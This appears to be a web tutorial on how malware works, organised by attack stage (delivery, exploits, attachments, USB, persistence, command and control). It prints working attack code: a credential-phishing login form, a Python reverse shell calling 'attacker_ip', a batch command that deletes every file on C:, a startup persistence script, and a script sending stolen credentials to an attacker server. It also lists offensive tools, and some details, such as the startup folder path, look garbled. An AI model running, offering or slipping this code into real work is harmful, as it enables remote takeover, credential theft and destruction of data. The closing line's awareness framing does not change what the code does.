How Malware Works (with Scripts and Examples)

Malware is malicious software designed to disrupt, damage, or gain unauthorized access to computer systems. Below is a detailed explanation of how various malware attack techniques work, along with scripts and examples in Python and Batch.

Step 1: Delivery

Malware can be delivered through several methods:

• Phishing: Sending fake emails or messages that trick users into downloading malware or revealing sensitive information.
• Unpatched Software Exploits: Taking advantage of vulnerabilities in unpatched software to install malware.
• Malicious Attachments: Embedding malware inside email attachments that execute when opened.
• Infected USB Devices: Physical malware delivery through USB drives that automatically run malicious scripts when inserted.

Example: Phishing

Phishing attacks often use fake login pages to steal user credentials. Here's an example of a simple phishing page structure:

<html>
    <head><title>Fake Login</title></head>
    <body>
        <h1>Login to your account</h1>
        <form action="steal_credentials.php" method="post">
            <input type="text" name="username" placeholder="Username" /><br/>
            <input type="password" name="password" placeholder="Password" /><br/>
            <input type="submit" value="Login" />
        </form>
    </body>
</html>
        

Tools for Phishing

Common tools used for phishing include:

• HiddenEye - A phishing tool with various attack vectors.
• WeeMan - A simple phishing tool for setting up fake websites.

Step 2: Unpatched Software Exploits

Exploiting vulnerabilities in unpatched software is another common malware delivery method. Attackers scan systems for weaknesses, then exploit them to gain unauthorized access.

// Exploit example (pseudocode)
if (software_version == vulnerable_version) {
    run_exploit();
    gain_root_access();
}
        

Tools for Exploits

Popular tools used to exploit vulnerabilities:

• Metasploit - A powerful tool for finding and exploiting vulnerabilities.
• Exploit DB - A database of publicly disclosed exploits.

Step 3: Malicious Attachments

Malicious attachments are used to deliver malware by hiding executable code inside seemingly harmless documents like PDFs or Word files.

Python Script Example

This Python script opens a backdoor to the system after the user opens the file:

# Example Python backdoor
import socket
import subprocess

def backdoor():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("attacker_ip", 4444))  # Replace with attacker's IP
    while True:
        command = s.recv(1024).decode("utf-8")
        if command.lower() == "exit":
            break
        result = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        output = result.stdout.read() + result.stderr.read()
        s.send(output)
    s.close()

backdoor()
        

Tools for Creating Malicious Attachments

• Cr3dOv3r - A tool to create and embed malicious payloads into documents.
• Veil - A tool that generates payloads to bypass antivirus software.

Step 4: Infected USB Devices

Infected USB drives can automatically execute malicious scripts when plugged into a computer. This method can infect air-gapped systems.

Batch Script Example

Here's a simple Batch script that deletes files from a system when executed from a USB drive:

:: Malicious Batch script to delete files
@echo off
echo WARNING: Your system is compromised!
del C:\*.* /F /S /Q
        

Tools for Creating Infected USB Devices

• Nishang - PowerShell scripts for post-exploitation, often used in infected USB drives.
• USB Rubber Ducky - A tool that allows you to create malicious USB devices for penetration testing.

Step 5: Persistence and Avoidance

Once the malware has infected a system, it will try to hide and maintain persistence. It can do this by modifying system files or adding startup scripts.

Batch Script Example for Persistence

This Batch script adds itself to the system startup to ensure it runs every time the computer reboots:

:: Add to startup for persistence
@echo off
copy %0 %APPDATA%\Microsoft\Windows\Start\Menu\Programs\Startup\persistent.bat
        

Tools for Persistence

• Empire - A post-exploitation framework that supports persistence techniques.
• Impacket - Python tools for network attacks, including persistence.

Step 6: Communication with Attacker (C2)

Once installed, the malware communicates with the attacker’s command and control (C2) server to receive instructions or send stolen data.

Python Script Example for C2 Communication

Here is an example Python script that sends stolen data to an attacker's server:

# Example Python C2 communication script
import socket

def send_data(data):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("attacker_ip", 5555))  # Replace with attacker's IP
    s.sendall(data.encode('utf-8'))
    s.close()

stolen_data = "Usernames and Passwords"
send_data(stolen_data)
        

Tools for C2 Communication

• Cobalt Strike - A tool for post-exploitation, including C2 communication.
• RedELK - A tracking tool for C2 server operations.

Conclusion

Malware can infect systems through various vectors, from phishing and exploits to malicious attachments and infected USB devices. Awareness of these techniques and the tools used can help in building stronger defenses against such attacks.